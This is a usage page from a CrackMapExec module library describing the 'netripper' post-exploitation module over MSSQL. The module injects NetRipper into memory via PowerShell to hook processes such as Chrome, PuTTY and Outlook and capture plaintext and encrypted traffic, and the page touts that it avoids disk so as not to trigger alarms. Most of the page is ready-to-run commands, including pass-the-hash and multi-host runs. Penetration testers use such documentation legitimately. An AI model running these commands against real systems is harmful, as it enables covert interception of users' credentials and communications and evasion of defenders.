CrackMapExec Netripper (mssql)

This page contains detailed information about how to use the netripper CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.


This module injects NetRipper (Invoke-NetRipper.ps1) into memory by using the Invoke-PSInject.ps1 PowerShell script. NetRipper is a post exploitation tool which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text and encrypted traffic. Note that NetRipper doesn't support injecting into x64 processes yet, which very much limits its use case.

The netripper module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols

  • mssql
  • smb

Module Source Code


Module Options

As you can see below, the netripper module has one option:

# cme mssql -M netripper --options
[*] netripper module options:

        PROCESS   Process to hook, only x86 processes are supported by NetRipper currently (Choices: firefox, chrome, putty, winscp, outlook, lync)

The PROCESS option is required. Make sure you set it when using this module.

Module Usage

This is how to use the netripper module while using the mssql protocol:

# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M netripper -o PROCESS=<name>

Admin user:
# cme mssql -u sa -p P@ss123 -d . -M netripper -o PROCESS=chrome
# cme mssql -u sa -p P@ss123 --local-auth -M netripper -o PROCESS=chrome

Normal user:
# cme mssql -u dbuser -p P@ss123 -d target.corp -M netripper -o PROCESS=chrome

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme mssql -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M netripper -o PROCESS=chrome
# cme mssql -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M netripper -o PROCESS=chrome
The netripper module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M netripper -o PROCESS=chrome
# cme mssql -u sa -p P@ss123 -d . -M netripper -o PROCESS=chrome
# cme mssql -u sa -p P@ss123 -d . -M netripper -o PROCESS=chrome



This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.